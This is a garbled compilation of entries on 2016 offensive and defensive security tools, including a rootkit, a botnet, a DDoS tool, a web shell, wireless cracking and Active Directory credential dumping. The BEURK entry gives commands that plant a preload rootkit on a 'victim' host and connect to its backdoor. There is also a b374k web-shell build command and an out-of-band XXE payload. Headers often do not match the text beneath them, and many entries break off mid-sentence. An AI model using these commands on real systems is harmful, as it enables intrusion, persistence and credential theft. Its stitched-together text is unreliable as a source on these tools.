2016 COMPILATION
To run:
if rpm distro:
$ sudo yum install libcurl-devel
$ make
$ ./0d1n
Download 0d1n
3VILTWINATTACKER - CREATE ROGUE WI-FI ACCESS
POINT AND SNOOPING ON THE TRAFFIC
Ubuntu
$ sudo apt-get install isc-dhcp-server
Kali linux
$ echo "deb http://ftp.de.debian.org/debian wheezy main" >> /etc/apt/sources.list
$ apt-get update && apt-get install isc-dhcp-server
Fedora
$ sudo yum install dhcp
Tools Options:
Download 3vilTwinAttacker
ACUNETIX CLAMPS DOWN ON COSTLY WEBSITE
SECURITY WITH ONLINE SOLUTION
PTW attack
Fragmentation attack
Download Aircrack-ng 1.2 RC 2
AIRCRACK-NG 1.2 RC 3 - WEP AND WPA-PSK KEYS
CRACKING PROGRAM
OSdep: Add missing RADIOTAP_SUPPORT_OVERRIDES check.
Download Aircrack-ng 1.2 RC 3
ANTICUCKOO - A TOOL TO DETECT AND CRASH
CUCKOO SANDBOX
Detection:
Cuckoo hooks detection (all kinds of Cuckoo hooks).
Suspicious data in own memory (without APIs, page by page scanning).
Crash (execute with arguments) (outside of a sandbox these args don't crash the program):
-c1: Modify the RET N instruction of a hooked API with a higher value. The next call to the API pushes more args onto the stack. If the hooked API is called from the
Cuckoo Crash
Download AntiCuckoo
APPCRASHVIEW - VIEW APPLICATION CRASHES (.WER
FILES)
/ProfilesFolder <Folder>
/ReportsFolder <Folder>
/ShowReportQueue <0 | 1>
/ShowReportArchive <0 | 1>
/stext <Filename>
/stab <Filename>
/scomma <Filename>
/stabular <Filename>
/shtml <Filename>
/sverhtml <Filename>
/sxml <Filename>
/sort <column>
/nosort
Download AppCrashView
APPIE - ANDROID PENTESTING PORTABLE INTEGRATED
ENVIRONMENT
Download Appie
APPUSE - ANDROID PENTEST PLATFORM UNIFIED
STANDALONE ENVIRONMENT
Easy to Use
Download AppUse
ARDT - AKAMAI REFLECTIVE DDOS TOOL
Attack the origin host behind the Akamai Edge hosts and
bypass the DDoS protection offered by Akamai services.
How it works...
What this tool does is, provided a list of Akamai edge nodes and a valid cache-missing request, produce multiple requests that hit the origin server via the Akamai edge nodes. As you can imagine, if you had 50 IP addresses under your control, sending requests at around 20 per second, with a 100,000 Akamai edge node list, and a request which results in 10KB hitting the origin, if my calculations are correct, that's around 976MB/ps hitting the origin server, which is a hell of a lot of traffic.
Finding Akamai Edge Nodes
This can be edited quite easily to find more; it then saves the IPs automatically.
Download ARDT
ARES - PYTHON BOTNET AND BACKDOOR
INSTALLATION
SERVER
Download Ares
emulator.git
$ aptitude install python-dev
$ make python_module
$ python setup.py install
Usage
Download AsHttp
ATSCAN - SERVER, SITE AND DORK SCANNER
DESCRIPTION:
ATSCAN Version 2
Dork scanner.
XSS scanner.
Sqlmap.
LFI scanner.
Filter wordpress and Joomla sites in the server.
Find Admin page.
Decode / Encode MD5 + Base64.
LIBRARIES TO INSTALL:
apt-get install libxml-simple-perl
SCREENSHOTS:
Download ATSCAN
AUTOBROWSER - CREATE REPORT AND SCREENSHOTS
OF HTTP/S BASED PORTS ON THE NETWORK
AutoBrowser is a tool written in Python for penetration testers. The purpose of this tool is to create a report and screenshots of HTTP/S-based ports on the network. It analyzes an Nmap report, or scans with Nmap, checks the results with an HTTP/S request to each host using a headless web browser, and grabs a screenshot of the response page content.
This tool is designed for IT professionals performing penetration tests, to scan and analyze Nmap results.
Examples
Scan with Nmap, check the results and create a folder named project_name:
python AutoBrowser.py scan "192.168.1.1/24" -a="-sT -sV -T3" -p project_name
Get the argument details of the analyze method:
python AutoBrowser.py analyze --help
Requirements:
Linux Installation:
1. sudo apt-get install python-pip python2.7-dev libxext-dev python-qt4 qt4-dev-tools build-essential nmap
2. sudo pip install -r requirements.txt
MacOSx Installation:
1. Install Xcode Command Line Tools (AppStore)
2. ruby -e "$(curl -fsSL https://raw.github.com/mxcl/homebrew/go)"
Windows Installation:
1. Install setuptools
2. Install pip
3. Install PyQt4
4. install Nmap
5. Open Command Prompt(cmd) as Administrator -> Goto
python folder -> Scripts (cd c:\Python27\Scripts)
6. pip install -r (Full Path To requirements.txt)
Download AutoBrowser
AUTOREAVER - MULTIPLE ACCESS POINT TARGETS
ATTACK USING REAVER
AutoReaver is a bash script which provides multiple access point attacks using reaver and a BSSID list from a text file.
If the processed AP reaches its rate limit, the script moves on to the next one from the list, and so forth.
HOW IT WORKS?
For example:
AA:BB:CC:DD:EE:FF 1 MyWlan
00:BB:CC:DD:EE:FF 13 TpLink
00:22:33:DD:EE:FF 13 MyHomeSSID
REQUIREMENTS
USAGE EXAMPLE
Go to auto-reaver directory
cd ./auto-reaver
Make sure that the scripts have x permissions for your user; if not, run
chmod 700 ./washAutoReaver
chmod 700 ./autoReaver
Wait for 1-2 minutes for wash to collect APs, and hit CTRL+C
ADDITIONAL FEATURES
AA:BB:CC:DD:EE:FF R MyWlan
Download AutoReaver
AUTORIZE - AUTOMATIC AUTHORIZATION
ENFORCEMENT DETECTION (EXTENSION FOR BURP
SUITE)
Installation
Download Autorize
AVCAESAR - MALWARE ANALYSIS ENGINE AND
REPOSITORY
Functionalities
Requirements :
Installation :
-o filename : save as filename
-p password : protect filename with password
-t theme : use theme
-m modules : modules
-s : strip
-b : encode with base64
-z [no|gzdeflate|gzencode|gzcompress] : compression (use only with -b)
-c [0-9] : level of compression
-l : list available modules
-k : list available themes
example:
$ php -f index.php -- -o myShell.php -p myPassword -s -b -z gzcompress -c 9
Download B374K
BABUN - A WINDOWS SHELL YOU WILL LOVE!
Plugin-oriented architecture
Integrated oh-my-zsh
Features in 3 minutes
Cygwin
The core of Babun consists of a pre-configured Cygwin. Cygwin is a great tool, but there's a lot of quirks and tricks that make you lose a lot of time to make it actually usable. Not only does babun solve most of these problems, but it also contains a lot of vital packages, so that you can be productive from the very first minute.
Package manager
Babun provides a package manager called pact. It is similar to
apt-get or yum. Pact enables installing/searching/upgrading
and deinstalling cygwin packages with no hassle at all. Just
invoke pact --help to check how to use it.
Shell
Babun's shell is tweaked in order to provide the best possible user experience. There are two shell types that are preconfigured and available right away: bash and zsh (zsh is the default one). Babun's shell features:
syntax highlighting
UNIX tools
git-aware prompt
Console
Mintty is the console used in babun. It features an xterm-256
mode, nice fonts and simply looks great!
Proxying
Babun supports HTTP proxying out of the box. Just add the
address and the credentials of your HTTP proxy server to
the .babunrc file located in your home folder and execute
source .babunrc to enable HTTP proxying. SOCKS proxies
are not supported for now.
Developer tools
Babun provides many packages, convenience tools and scripts
that make your life much easier. The long list of features
includes:
programming languages (Python, Perl, etc.)
oh-my-zsh
Plugin architecture
Babun has a very small microkernel (cygwin, a couple of bash scripts and a bit of a convention) and a plugin architecture on top of it. It means that almost everything is a plugin in babun's world! Not only does it structure babun in a clean way, but it also enables others to contribute small chunks of code.
Currently, babun comprises the following plugins:
cacert
core
git
oh-my-zsh
pact
cygdrive
dist
shell
Auto-update
Self-update is at the very heart of babun! Many Cygwin tools
are simple bash scripts - once you install them there is no
chance of getting the newer version in a smooth way. You
either delete the older version or overwrite it with the newest
one losing all the changes you have made in between.
Babun contains an auto-update feature which enables updating
both the microkernel, the plugins and even the underlying
cygwin. Files located in your home folder will never be deleted
nor overwritten which preserves your local config and
customizations.
Installer
Babun features a silent command-line installation script that may be executed without admin rights on any Windows host.
Using babun
Setting up proxy
To set up a proxy, uncomment the following lines in the .babunrc file (%USER_HOME%\.babun\cygwin\home\USER\.babunrc):
# Uncomment this lines to set up your proxy
# export http_proxy=http://user:password@server:port
# export https_proxy=$http_proxy
# export ftp_proxy=$http_proxy
# export no_proxy=localhost
Setting up git
pact --help
"pact describe <patterns>" to describe packages matching patterns
"pact packageof <commands or files>" to locate parent packages
"pact invalidate" to invalidate pact caches (setup.ini, etc.)
Options:
--mirror, -m <url> : set mirror
--invalidate, -i : invalidate pact caches (setup.ini, etc.)
--force, -f : force the execution
--help
--version
The output contains two lines: the previous default shell and the
new default shell
Checking the configuration
babun check
Executing babun check
Prompt speed [OK]
Connection check [OK]
Update check [OK]
Cygwin check [OK]
babun check
Executing babun check
Prompt speed [OK]
Connection check [OK]
Update check [OK]
Cygwin check [OUTDATED]
It will check if there are problems with the speed of the git prompt, if there's access to the Internet, or finally if you are running the newest version of babun.
The command will output hints if problems occur:
{ ~ } babun check
Executing babun check
Prompt speed [SLOW]
Connection check [OK]
Update check [OK]
Cygwin check [OK]
Updating babun
To update babun to the newest version execute:
babun update
Startup screen
Shell prompt
Babun update
Download Babun
BACKBOX LINUX 4.2 - UBUNTU-BASED LINUX
System requirements
Upgrade instructions
System requirements
Upgrade instructions
Download Bacula
BEESWARM - ACTIVE IDS MADE EASY
Download Beeswarm
Download BetterCap
BEURK - EXPERIMENTAL UNIX ROOTKIT
BEURK is a userland preload rootkit for GNU/Linux, heavily focused on anti-debugging and anti-detection.
NOTE: BEURK is a recursive acronym for BEURK Experimental Unix RootKit
Features
Upcoming features
Usage
Compile
git clone https://github.com/unix-thrust/beurk.git
cd beurk
make
Install
scp libselinux.so root@victim.com:/lib/
ssh root@victim.com 'echo /lib/libselinux.so >> /etc/ld.so.preload'
Enjoy!
./client.py victim_ip:port # connect with furtive backdoor
Dependencies
Download Beurk
BLACKARCH LINUX V2015.07.31 - PENETRATION
TESTING DISTRIBUTION
GetProcAddress, etc.)
Security cookie initialization
C++/CLI images are supported
Image unloading
Increase reference counter for import libraries in case
of manual import mapping
Cyclic dependencies are handled properly
Driver features
Allocate/free/protect user memory
Read/write user and kernel memory
Disable permanent DEP for WOW64 processes
Change process protection flag
Change handle access rights
Remap process memory
Hiding allocated user-mode memory
User-mode dll injection and manual mapping
Manual mapping of drivers
Download Blackbone
BLUEMAHO - BLUETOOTH SECURITY TESTING SUITE
Tools:
atshell.c by Bastian Ballmann (modified attest.c by Marcel
Holtmann)
bccmd by Marcel Holtmann
bdaddr.c by Marcel Holtmann
bluetracker.py by smiley
carwhisperer v0.2 by Martin Herfurt
psm_scan and rfcomm_scan from bt_audit-0.1.1 by Collin
R. Mulliner
BSS (Bluetooth Stack Smasher) v0.8 by Pierre Betouin
btftp v0.1 by Marcel Holtmann
btobex v0.1 by Marcel Holtmann
greenplaque v1.5 by digitalmunition.com
L2CAP packetgenerator by Bastian Ballmann
obex stress tests 0.1
redfang v2.50 by Ollie Whitehouse
ussp-push v0.10 by Davide Libenzi
exploits/attacks:
Bluebugger v0.1 by Martin J. Muench
bluePIMp by Kevin Finisterre
BlueZ hcidump v1.29 DoS PoC by Pierre Betouin
helomoto by Adam Laurie
hidattack v0.1 by Collin R. Mulliner
Mode 3 abuse attack
Nokia N70 l2cap packet DoS PoC Pierre Betouin
opush abuse (prompts flood) DoS attack
Sony-Ericsson reset display PoC by Pierre Betouin
You can add your own tools by editing 'exploits/exploits.lst' and 'tools/tools.lst'.
Requirements
Download BlueMaho
BLUESCREENVIEW - BLUE SCREEN OF DEATH (STOP
ERROR) INFORMATION IN DUMP FILES
Using BlueScreenView
/LoadFrom <Source>
/MiniDumpFolder <Folder>
/SingleDumpFile <Filename>
/ComputersFile <Filename>
/LowerPaneMode <1 - 3>
/stext <Filename>
/stab <Filename>
/scomma <Filename>
/stabular <Filename>
/shtml <Filename>
/sverhtml <Filename>
/sxml <Filename>
/sort <column>
/nosort
Download BlueScreenView
BLUTO - DNS RECON, DNS ZONE TRANSFER, AND EMAIL
ENUMERATION
Email Enumeration
The target domain is queried for MX and NS records. Subdomains are passively gathered via NetCraft. The target domain's NS records are each queried for potential zone transfers. If none of them gives up their spinach, Bluto will brute-force subdomains using parallel sub-processing on the top 20000 of 'The Alexa Top 1 Million subdomains'. NetCraft results are presented individually and are then compared to the brute-force results; any duplications are
(1) Mac and Kali users can simply use the following command
to download and install pip.
curl https://bootstrap.pypa.io/get-pip.py -o - | python
(2) You should now be able to execute 'bluto' from any working
directory in any terminal.
bluto
Upgrade Instructions
--upgrade
Download Bluto
BOHATEI - FLEXIBLE AND ELASTIC DDOS DEFENSE
The frontend folder contains the required files for the web
interface.
For the experiments performed, we used a set of VM images
that contain implementations of the strategy graphs for each
type of attack (SYN Flood, UDP Flood, DNS Amplification and
Elephant Flow). Those images will become available at a later
stage. The tools that were used for those strategy graphs are
the following:
Bro
Snort
Balancer
Iptables
Iperf
Custom scripts to simulate the attacks
Bohatei Paper
Bohatei Slides
Video
Download Bohatei
BRUTEX - AUTOMATICALLY BRUTE FORCE ALL
SERVICES RUNNING ON A TARGET
DEPENDENCIES
NMap
Hydra
Wfuzz
SNMPWalk
DNSDict
Download BruteX
BTPROXY - MAN IN THE MIDDLE ANALYSIS TOOL FOR
BLUETOOTH
Tested Devices
Pebble Steel smart watch
Moto 360 smart watch
OBDLink OBD-II Bluetooth Dongle
Withings Smart Baby Monitor
If you have tried anything else, please let me know at conorpp
(at) vt (dot) edu.
Dependencies
Need at least 1 Bluetooth card (either USB or internal).
Installation
sudo python setup.py install
Running
To run a simple MiTM or proxy on two devices, run
btproxy <master-bt-mac-address> <slave-bt-mac-address>
where the master is typically the phone and the slave MAC address is typically the other peripheral device (smart watch, headphones, keyboard, OBD2 dongle, etc.).
The master is the device that sends the connection request and the slave is the device listening for something to connect to it.
After the proxy connects to the slave device and the master connects to the proxy device, you will be able to see traffic and modify it.
How to find the BT MAC Address?
Well, for a phone you can usually look it up in the settings. The most robust way is to put the device in advertising mode and scan for it.
There are two ways to scan for devices: scanning and inquiring. hcitool can be used to do this:
hcitool scan
hcitool inq
Usage
Some devices may restrict connecting based on the name, class, or address of another Bluetooth device.
So the program will look up those three properties of the target devices to be proxied, and then clone them onto the proxying adapter(s).
Then it will first try connecting to the slave device from the cloned master adapter. It will make a socket for each service hosted by the slave and relay traffic for each one independently.
After the slave is connected, the cloned slave adapter will be set to listen for a connection from the master. At this point, the real master device should connect to the adapter.
After the master connects, the proxied connection is complete.
Using only one adapter
This program uses either 1 or 2 Bluetooth adapters. If you use one adapter, then only the slave device will be cloned. Both devices will be cloned if 2 adapters are used; this might be necessary for more restrictive Bluetooth devices.
Advanced Usage
Manipulation of the traffic can be handled via Python by passing an inline script. Just implement the master_cb and slave_cb callback functions. These are called upon receiving data, and the returned data is sent back out to the corresponding device.
# replace.py
def master_cb(req):
    """
    Received something from master, about to be sent to slave.
    """
    print('<< %r' % (req,))
    # Append the raw bytes to a log file, then forward them unchanged.
    with open('mastermessages.log', 'ab') as log:
        log.write(req)
    return req


def slave_cb(res):
    """
    Same as above, but it's from slave about to be sent to master.
    """
    print('>> %r' % (res,))
    with open('slavemessages.log', 'ab') as log:
        log.write(res)
    return res
Download Btproxy
BURP SUITE PROFESSIONAL 1.6.26 - THE LEADING
TOOLKIT FOR WEB APPLICATION SECURITY TESTING
v1.6.15
This release introduces a brand new feature: Burp
Collaborator.
Burp Collaborator is an external service that Burp can use to
help discover many kinds of vulnerabilities, and has the
potential to revolutionize web security testing. In the coming
months, we will be adding many exciting new capabilities to
functionality.
An advanced web application Scanner, for automating the
detection of numerous types of vulnerability.
An Intruder tool, for performing powerful customized
attacks to find and exploit unusual vulnerabilities.
A Repeater tool, for manipulating and resending individual
requests.
A Sequencer tool, for testing the randomness of session
tokens.
The ability to save your work and resume working later.
Extensibility, allowing you to easily write your own
plugins, to perform complex and highly customized tasks
within Burp.
v1.6.23
This release adds a new scan check for external service
interaction and out-of-band resource load via injected XML
doctype tags containing entity parameters. Burp now sends
payloads like:
<?xml version='1.0' standalone='no'?><!DOCTYPE foo [<!ENTITY % f5a30 SYSTEM "http://u1w9aaozql7z31394loost.burpcollaborator.net"> %f5a30; ]>
and reports an appropriate issue based on any observed
interactions (DNS or HTTP) that reach the Burp Collaborator
server.
the contents of their pages dynamically. It also provides a bidirectional JavaScript bridge API which allows users to create quick one-off BurpSuite plugin prototypes which can interact directly with the DOM and Burp's extender API.
System Requirements
Download Burpkit
BWA - OWASP BROKEN WEB APPLICATIONS PROJECT
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
Usage
Steps include:
1. Add extension to burp
2. Create a session handling rule in Burp that invokes this
extension
3. Modify the scope to include applicable tools and URLs
4. Configure the bypass options on the "Bypass WAF" tab
5. Test away
Read more here.
Features
Download BypassWAF
CAPTIPPER - MALICIOUS HTTP TRAFFIC EXPLORER
TOOL
Download CapTipper
CENOCIPHER - EASY-TO-USE, END-TO-END ENCRYPTED
COMMUNICATIONS TOOL
FEATURES AT A GLANCE
TECHNICAL DETAILS
Download CenoCipher
CHEAT - CREATE AND VIEW INTERACTIVE
CHEATSHEETS ON THE COMMAND-LINE
Using pip
sudo pip install cheat
Using homebrew
brew install cheat
Manually
First install the required python dependencies with:
sudo pip install docopt pygments
Modifying Cheatsheets
Download Cheat
CHROME AUTOFILL VIEWER - TOOL TO VIEW OR DELETE
AUTOCOMPLETE DATA FROM GOOGLE CHROME
BROWSER
How to Use?
interface.
Here are the brief usage details
Launch ChromeAutofillViewer on your system
By default it will automatically find and display the autofill
file from default profile location of Chrome. You can also
select the desired file manually.
Next click on 'Show All' button and all stored Autofill data
will be displayed in the list as shown in screenshot 1
below.
If you want to remove all the entries, click on 'Delete All'
button below.
Finally you can save all displayed entries to HTML/XML/
TEXT/CSV file by clicking on 'Export' button and then
select the type of file from the drop down box of 'Save File
Dialog'.
Starting from version 1.05, you can also read the passwords
stored by Chrome Web browser from an external profile in your
current operating system or from another external drive (For
example: from a dead system that cannot boot anymore). In
order to use this feature, you must know the last logged-on
password used for this profile, because the passwords are
encrypted with the SHA hash of the log-on password, and
without that hash, the passwords cannot be decrypted.
You can use this feature from the UI, by selecting the
'Advanced Options' in the File menu, or from command-line, by
using /external parameter. The user profile path should be
something like "C:\Documents and Settings\admin" in Windows
XP/2003 or "C:\users\myuser" in Windows Vista/2008.
Command-Line Options
/stext <Filename>
/stab <Filename>
/scomma <Filename>
/stabular <Filename>
/shtml <Filename>
/sverhtml <Filename>
/sxml <Filename>
/skeepass <Filename>
Download ChromePass
CMSMAP - SCANNER TO DETECT SECURITY FLAWS OF
THE MOST POPULAR CMSS (WORDPRESS, JOOMLA AND
DRUPAL)
Usage
abc.test.com:8080/')
-v, --verbose
-T, --threads
-u, --usr  username or file
-p, --psw  password or file
-i, --input
-k, --crack
-w, --wordlist
-U, --update
(J)oomla or (D)rupal
-F, --fullscan
cmsmap.py -k hashes.txt
Download CMSmap
CODETAINER - A DOCKER CONTAINER IN YOUR
BROWSER
godep
make
Configuring codetainer
certs"
# DockerCertPath = "/path/to/certs"
# Database path (optional, default is ~/.codetainer/codetainer.db)
# DatabasePath = "/path/to/codetainer.db"
3000
<html>
<head>
<meta charset="UTF-8">
<title>lsof tutorial</title>
<script src="http://code.jquery.com/jquery-1.10.1.min.js"></script>
<script src="/javascripts/codetainer.js"></script>
<script src="/javascripts/lsof.js"></script>
</head>
<body>
</body>
</html>
Run the javascript to load the codetainer iframe from the codetainer API server (supply data-container as the id of codetainer on the div, or supply codetainer in the constructor options).
$('#terminal').codetainer({
  terminalOnly: false, // set to true
  // replace with
  height: "100%",
});
Download Codetainer
COLLECTION OF AWESOME HONEYPOTS
HONEYPOTS
Database Honeypots
Elastic honey - A Simple Elasticsearch Honeypot
mysql - A mysql honeypot, still very very early stage
A framework for nosql databases (only redis for now) - The NoSQL Honeypot Framework
ESPot - ElasticSearch Honeypot
Web honeypots
Glastopf - Web Application Honeypot
phpmyadmin_honeypot - A simple and effective phpMyAdmin honeypot
servlet - Web application Honeypot
Nodepot - A nodejs web application honeypot
basic-auth-pot bap - http Basic Authentication
honeyPot
Shadow Daemon - A modular Web Application
Firewall / High-Interaction Honeypot for PHP, Perl &
Python apps
Servletpot - Web application Honeypot
Google Hack Honeypot - designed to provide
reconnaissance against attackers that use search
engines as a hacking tool against your resources.
smart-honeypot - PHP Script demonstrating a smart
honey pot
HonnyPotter - A WordPress login honeypot for
collection and analysis of failed login attempts.
wp-smart-honeypot - WordPress plugin to reduce
comment spam with a smarter honeypot
wordpot - A WordPress Honeypot
Bukkit Honeypot Honeypot - A honeypot plugin for
Bukkit
Laravel Application Honeypot - Honeypot - Simple
spam prevention package for Laravel applications
stack-honeypot - Inserts a trap for spam bots into
responses
EoHoneypotBundle - Honeypot type for Symfony2
forms
shockpot - WebApp Honeypot for detecting Shell
Shock exploit attempts
Service Honeypots
Kippo - Medium interaction SSH honeypot
honeyntp - NTP logger/honeypot
honeypot-camera - observation camera honeypot
troje - a honeypot built around lxc containers. It will run each connection with the service within a separate lxc container.
slipm-honeypot - A simple low-interaction port
monitoring honeypot
HoneyPy - A low interaction honeypot
Ensnare - Easy to deploy Ruby honeypot
RDPy - A Microsoft Remote Desktop Protocol (RDP)
honeypot in python
Anti-honeypot stuff
kippo_detect - This is not a honeypot, but it detects
kippo. (This guy has lots of more interesting stuff)
ICS/SCADA honeypots
Conpot - ICS/SCADA honeypot
scada-honeynet - mimics many of the services from a
popular PLC and better helps SCADA researchers
understand potential risks of exposed control system
devices
SCADA honeynet - Building Honeypots for Industrial
Networks
Deployment
Dionaea and EC2 in 20 Minutes - a tutorial on setting
up Dionaea on an EC2 instance
honeypotpi - Script for turning a Raspberry Pi into a
Honey Pot Pi
Data Analysis
Kippo-Graph - a full featured script to visualize
honeypot database
Sebek in QEMU
Qebek - QEMU based Sebek. As Sebek, it is data
capture tool for high interaction honeypot
Malware Simulator
imalse - Integrated MALware Simulator and Emulator
Distributed sensor deployment
Smarthoneypot - custom honeypot intelligence
system that is simple to deploy and easy to manage
Modern Honey Network - Multi-snort and honeypot
sensor management, uses a network of VMs, small
footprint SNORT installations, stealthy dionaeas, and
a centralized server for management
ADHD - Active Defense Harbinger Distribution
(ADHD) is a Linux distro based on Ubuntu LTS. It
comes with many tools aimed at active defense
preinstalled and configured
Network Analysis Tool
Tracexploit - replay network packets
Log anonymizer
LogAnon - log anonymization library that helps
having anonymous logs consistent between logs and
network captures
Server
Honeysink - open source network sinkhole that
provides a mechanism for detection and prevention
of malicious traffic on a given network
Botnet traffic detection
dnsMole - analyse DNS traffic, and potentially detect botnet C&C servers and infected hosts
Low interaction honeypot (router back door)
Honeypot-32764 - Honeypot for router backdoor
(TCP 32764)
honeynet farm traffic redirector
Honeymole - deploy multiple sensors that redirect traffic to a centralized collection of honeypots
HTTPS Proxy
mitmproxy - allows traffic flows to be intercepted,
inspected, modified and replayed
spamtrap
SendMeSpamIDS.py Simple SMTP fetch all IDS and
analyzer
System instrumentation
Sysdig - open source, system-level exploration:
capture system state and activity from a running
Linux instance, then save, filter and analyze
Honeypot for USB-spreading malware
Ghost-usb - honeypot for malware that propagates
via USB storage devices
Data Collection
Kippo2MySQL - extracts some very basic stats from Kippo's text-based log files (a mess to analyze!) and inserts them in a MySQL database
Kippo2ElasticSearch - Python script to transfer data
from a Kippo SSH honeypot MySQL database to an
ElasticSearch instance (server or cluster)
Passive network audit framework parser
pnaf - Passive Network Audit Framework
VM Introspection
VIX virtual machine introspection toolkit - VMI toolkit
for Xen, called Virtual Introspection for Xen (VIX)
vmscope - Monitoring of VM-based High-Interaction
Honeypots
vmitools - C library with Python bindings that makes it
easy to monitor the low-level details of a running
virtual machine
Binary debugger
Hexgolems - Schem Debugger Frontend - A
debugger frontend
Hexgolems - Pint Debugger Backend - A debugger
backend and LUA wrapper for PIN
Mobile Analysis Tool
SurfIDS
Automated malware analysis system
Cuckoo
Anubis
Hybrid Analysis
Low interaction
mwcollectd
Low interaction honeypot on USB stick
Honeystick
Honeypot extensions to Wireshark
Wireshark Extensions
Data Analysis Tool
HpfeedsHoneyGraph
Acapulco
Telephony honeypot
Zapping Rachel
Client
Pwnypot
MonkeySpider
Capture-HPC-NG
Wepawet
URLQuery
Trigona
Thug
Shelia
PhoneyC
Jsunpack-n
HoneyC
HoneyBOT
CWSandbox / GFI Sandbox
Capture-HPC-Linux
Capture-HPC
Andrubis
Visual analysis for network traffic
ovizart
Binary Management and Analysis Framework
Viper
Honeypot
Single-honeypot
Honeyd For Windows
IMHoneypot
Deception Toolkit
PDF document inspector
peepdf
Distribution system
Thug Distributed Task Queuing
HoneyClient Management
HoneyWeb
Network Analysis
HoneyProxy
Hybrid low/high interaction honeypot
HoneyBrid
Sebek on Xen
xebek
SSH Honeypot
Kojoney
Cowrie
Glastopf data analysis
Glastopf Analytics
Distributed sensor project
DShield Web Honeypot Project
Distributed Web Honeypot Project
a pcap analyzer
Honeysnap
Client Web crawler
HoneySpider Network
network traffic redirector
Honeywall
Honeypot Distribution with mixed content
HoneyDrive
Honeypot sensor
Dragon Research Group Distro
Network analysis
Quechua
Sebek data visualization
Sebek Dataviz
SIP Server
Artemnesia VoIP
Botnet C2 monitoring
botsnoopd
low interaction
mysqlpot
Malware collection
Honeybow
HONEYD TOOLS
Honeyd plugin
Honeycomb
Honeyd viewer
Honeyview
Honeyd to MySQL connector
Honeyd2MySQL
A script to visualize statistics from honeyd
Honeyd-Viz
Honeyd UI
Honeyd configuration GUI - application used to
configure the honeyd daemon and generate
configuration files
Honeyd stats
Honeydsum.pl
Sandbox
RFISandbox - a PHP 5.x script sandbox built on top
of funcall
dorothy2 - A malware/botnet analysis framework
written in Ruby
COMODO automated sandbox
Argos - An emulator for capturing zero-day attacks
Sandbox-as-a-Service
malwr.com - free malware analysis service and
community
detux.org - Multiplatform Linux Sandbox
Joebox Cloud - analyzes the behavior of malicious
files including PEs, PDFs, DOCs, PPTs, XLSs,
APKs, URLs and MachOs on Windows, Android and
Mac OS X for suspicious activities
DATA TOOLS
Front Ends
Tango - Honeypot Intelligence with Splunk
Django-kippo - Django App for kippo SSH Honeypot
Wordpot-Frontend - a full featured script to visualize statistics from a Wordpot honeypot
Shockpot-Frontend - a full featured script to visualize statistics from a Shockpot honeypot
Visualization
Source
COMMIX - AUTOMATED ALL-IN-ONE OS COMMAND
Usage
--install
--version
--update
and exit.
Target
This option has to be provided, to define the target URL.
--url=URL  Target URL.
--url-reload  execution.
Request
These options can be used to specify how to connect to the target URL.
--host=HOST
--referer=REFERER
--user-agent=AGENT
--cookie=COOKIE
--headers=HEADERS  'Header1:Value1\nHeader2:Value2').
--proxy=PROXY  '127.0.0.1:8080').
--auth-url=AUTH_..
--auth-data=AUTH..
--auth-cred=AUTH..  (e.g. 'admin:admin').
Injection
These options can be used to specify which parameters to inject and to provide custom injection payloads.
--data=DATA  'INJECT_HERE' tag).
--suffix=SUFFIX
--prefix=PREFIX
--technique=TECH  technique: 'classic', 'eval-based', 'time-based' or 'file-based'.
--maxlen=MAXLEN  based technique (Default: 10000 chars).
--delay=DELAY  file-based techniques (Default: 1 sec).
--base64  files directory.
--icmp-exfil=IP_..  (e.g. 'ip_src=192.168.178.1,ip_dst=192.168.178.3').
Usage Examples
Download Commix
COOKIES MANAGER - SIMPLE COOKIE STEALER
DownloadCookies Manager
COOKIESCANNER - TOOL TO CHECK THE COOKIE FLAG
FOR A MULTIPLE SITES
FEATURES:
Multiple output formats (xml, json, csv, grepable), which can be exported with shell redirection (>).
Check the flags in multiple sites from a file input (one site per line). This is very useful for pentesters who want to check the flags in multiple sites.
Google search: search Google for all subdomains and check the cookies for each domain.
Colors for the normal output.
USAGE
Usage: cookiescanner.py [options]
Example: ./cookiescanner.py -i ips.txt
Options:
  -h, --help
  -i INPUT, --input=INPUT     File input with the list of webservers
  -I, --info                  More info
  -u URL, --url=URL           URL
  -f FORMAT, --format=FORMAT  Output format (json, xml, csv, normal, grepable)
  --nocolor                   … format output)
  -g GOOGLE, --google=GOOGLE  Search in google by domain
REQUIREMENTS
requests >= 2.8.1
BeautifulSoup >= 4.2.1
INSTALL REQUIREMENTS
pip3 install --upgrade -r requirements.txt
DownloadCookiescanner
COWRIE - SSH HONEYPOT
Software required:
An operating system (tested on Debian, CentOS,
FreeBSD and Windows 7)
Python 2.5+
Twisted 8.0+
PyCrypto
pyasn1
Zope Interface
Files of interest:
DownloadCowrie
CRACKMAPEXEC - A SWISS ARMY KNIFE FOR
PENTESTING WINDOWS/ACTIVE DIRECTORY
ENVIRONMENTS
Swiss army knife for pentesting Windows/Active Directory environments | @byt3bl33d3r
Powered by Impacket https://github.com/CoreSecurity/impacket (@agsolino)
Inspired by:
@ShawnDEvans's smbmap https://github.com/ShawnDEvans/smbmap
@gojhonny's CredCrack https://github.com/gojhonny/CredCrack
@pentestgeek's smbexec https://github.com/pentestgeek/smbexec
positional arguments:
  target
  -t THREADS                    … to use
  -u USERNAME                   … assumed
  -p PASSWORD                   Password
  -H HASH                       NTLM hash
  -n NAMESPACE                  (… cimv2)
  -d DOMAIN                     Domain name
  -s SHARE
  -P {139,445}
  -v
Credential Gathering:
  Options for gathering credentials
  --sam                         … systems
  --mimikatz                    … systems
  --ntds {ninja,vss,drsuapi}    Dump the NTDS.dit from target DCs using the specified method (drsuapi is the fastest)
Mapping/Enumeration:
  Options for Mapping/Enumerating
  --shares                      List shares
  --sessions
  --users                       Enumerate users
  --lusers
  --wmi QUERY
Account Bruteforcing:
  … found
Spidering:
  Options for spidering shares
  --spider FOLDER               (… 1)
Command Execution:
  Options for executing commands
  --execm {atexec,wmi,smbexec}  Method to execute the command (default: smbexec)
  -x COMMAND
  -X PS_COMMAND                 … command
Shellcode/EXE/DLL injection:
  Options for injecting Shellcode/EXE/DLL's using PowerShell
  --inject {exe,shellcode,dll}  Inject Shellcode, EXE or a DLL
  --path PATH
  --download PATH               … systems
  --upload SRC DST              … systems
  --delete PATH
Examples
The most basic usage: scans the subnet using 100 concurrent threads:
#~ python crackmapexec.py -t 100 172.16.206.0/24
[+] 172.16.206.132:445 is running Windows 6.1 Build 7601 (name:DRUGCOMPANY-PC) (domain:DRUGCOMPANY-PC)
[+] 172.16.206.133:445 is running Windows 6.3 Build 9600 (name:DRUGOUTCOVE-PC) (domain:DRUGOUTCOVE-PC)
